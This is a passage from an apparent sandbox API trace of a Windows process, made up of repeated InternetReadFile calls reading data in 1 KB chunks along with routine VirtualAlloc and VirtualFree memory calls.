lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.704] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.704] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.705] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.705] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.705] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.705] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.705] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.705] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.706] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.706] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.706] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.706] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.706] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.706] VirtualAlloc (lpAddress=0x2fac000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2fac000 [0098.707] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.707] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.707] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.707] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.707] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.708] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.708] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.708] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.708] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.708] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.709] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.709] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.709] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.709] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.709] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.709] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.710] VirtualAlloc (lpAddress=0x2fb0000, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x4) returned 0x0 [0098.710] VirtualAlloc (lpAddress=0x2fb0000, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x0 [0098.710] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x35b0000 [0098.710] VirtualAlloc (lpAddress=0x35b0000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.711] VirtualFree (lpAddress=0x2fa8000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0098.712] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.803] VirtualAlloc (lpAddress=0x35bc000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x35bc000 [0098.804] VirtualFree (lpAddress=0x35b0000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0098.804] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.805] VirtualAlloc (lpAddress=0x35c8000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c8000 [0098.806] VirtualFree (lpAddress=0x35b8000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.806] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.806] VirtualAlloc (lpAddress=0x35b0000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.806] VirtualFree (lpAddress=0x35d0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.807] VirtualFree (lpAddress=0x35c4000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0098.808] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.808] VirtualFree (lpAddress=0x35cc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.808] VirtualAlloc (lpAddress=0x35bc000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x35bc000 [0098.809] VirtualFree (lpAddress=0x35b0000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0098.809] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.809] VirtualAlloc (lpAddress=0x35c8000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c8000 [0098.810] VirtualFree (lpAddress=0x35b8000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.811] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.811] VirtualAlloc (lpAddress=0x35b0000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.812] VirtualFree (lpAddress=0x35c4000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.812] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.812] VirtualFree (lpAddress=0x35d0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.813] VirtualAlloc (lpAddress=0x35bc000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x35bc000 [0098.813] VirtualFree (lpAddress=0x35b0000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0098.814] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.814] VirtualAlloc (lpAddress=0x35c8000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c8000 [0098.815] VirtualFree (lpAddress=0x35b8000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.815] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.815] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.816] VirtualFree (lpAddress=0x35c4000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.817] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.817] VirtualFree (lpAddress=0x35d0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.817] VirtualAlloc (lpAddress=0x35c0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c0000 [0098.818] VirtualFree (lpAddress=0x35b0000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.819] VirtualAlloc (lpAddress=0x35d0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d0000 [0098.819] VirtualFree (lpAddress=0x35cc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.820] VirtualFree (lpAddress=0x35bc000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.821] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.821] VirtualFree (lpAddress=0x35c8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.821] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.822] VirtualFree (lpAddress=0x35d0000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.823] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.823] VirtualFree (lpAddress=0x35dc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.823] VirtualAlloc (lpAddress=0x35c0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c0000 [0098.824] VirtualFree (lpAddress=0x35b0000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.824] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.824] VirtualAlloc (lpAddress=0x35d0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d0000 [0098.825] VirtualFree (lpAddress=0x35cc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.826] VirtualFree (lpAddress=0x35bc000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.826] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.826] VirtualFree (lpAddress=0x35c8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.826] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.827] VirtualFree (lpAddress=0x35d0000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.828] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.828] VirtualFree (lpAddress=0x35dc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.828] VirtualAlloc (lpAddress=0x35c0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c0000 [0098.830] VirtualFree (lpAddress=0x35b0000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.830] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.830] VirtualAlloc (lpAddress=0x35d0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d0000 [0098.831] VirtualFree (lpAddress=0x35cc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.832] VirtualFree (lpAddress=0x35bc000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.832] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.833] VirtualFree (lpAddress=0x35c8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.833] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.834] VirtualFree (lpAddress=0x35d0000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.835] VirtualFree (lpAddress=0x35dc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.835] VirtualAlloc (lpAddress=0x35c0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c0000 [0098.837] VirtualFree (lpAddress=0x35b0000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.837] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.837] VirtualAlloc (lpAddress=0x35d0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d0000 [0098.839] VirtualFree (lpAddress=0x35bc000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0098.840] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.840] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.841] VirtualFree (lpAddress=0x35cc000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0098.842] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.842] VirtualFree (lpAddress=0x35dc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.842] VirtualAlloc (lpAddress=0x35c0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c0000 [0098.843] VirtualFree (lpAddress=0x35b0000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0098.844] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.844] VirtualAlloc (lpAddress=0x35d0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d0000 [0098.845] VirtualFree (lpAddress=0x35bc000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0098.846] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.846] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.847] VirtualFree (lpAddress=0x35cc000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0098.848] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.848] VirtualAlloc (lpAddress=0x35c0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c0000 [0098.849] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.849] VirtualFree (lpAddress=0x35dc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.849] VirtualAlloc (lpAddress=0x35c4000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c4000 [0098.851] VirtualFree (lpAddress=0x35b0000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0098.851] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.851] VirtualAlloc (lpAddress=0x35d8000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d8000 [0098.852] VirtualFree (lpAddress=0x35d4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.853] VirtualFree (lpAddress=0x35c0000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0098.853] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.853] VirtualFree (lpAddress=0x35d0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.854] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.855] VirtualFree (lpAddress=0x35d8000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0098.855] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.856] VirtualFree (lpAddress=0x35e8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.856] VirtualAlloc (lpAddress=0x35c4000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c4000 [0098.857] VirtualFree (lpAddress=0x35b0000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0098.858] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.858] VirtualAlloc (lpAddress=0x35d8000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d8000 [0098.859] VirtualFree (lpAddress=0x35d4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.860] VirtualFree (lpAddress=0x35c0000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0098.861] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.861] VirtualFree (lpAddress=0x35d0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.861] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.863] VirtualFree (lpAddress=0x35d8000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0098.863] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.864] VirtualFree (lpAddress=0x35e8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.864] VirtualAlloc (lpAddress=0x35c4000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c4000 [0098.865] VirtualFree (lpAddress=0x35b0000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0098.866] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.866] VirtualAlloc (lpAddress=0x35d8000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d8000 [0098.866] VirtualFree (lpAddress=0x35d4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.867] VirtualFree (lpAddress=0x35c0000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0098.868] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.868] VirtualFree (lpAddress=0x35d0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.868] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.870] VirtualFree (lpAddress=0x35d8000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0098.871] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.871] VirtualFree (lpAddress=0x35e8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.871] VirtualAlloc (lpAddress=0x35c4000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c4000 [0098.873] VirtualFree (lpAddress=0x35b0000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0098.874] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.874] VirtualAlloc (lpAddress=0x35d8000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d8000 [0098.875] VirtualFree (lpAddress=0x35c0000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0098.876] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.876] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x14000, flAllocationType=0x1000, 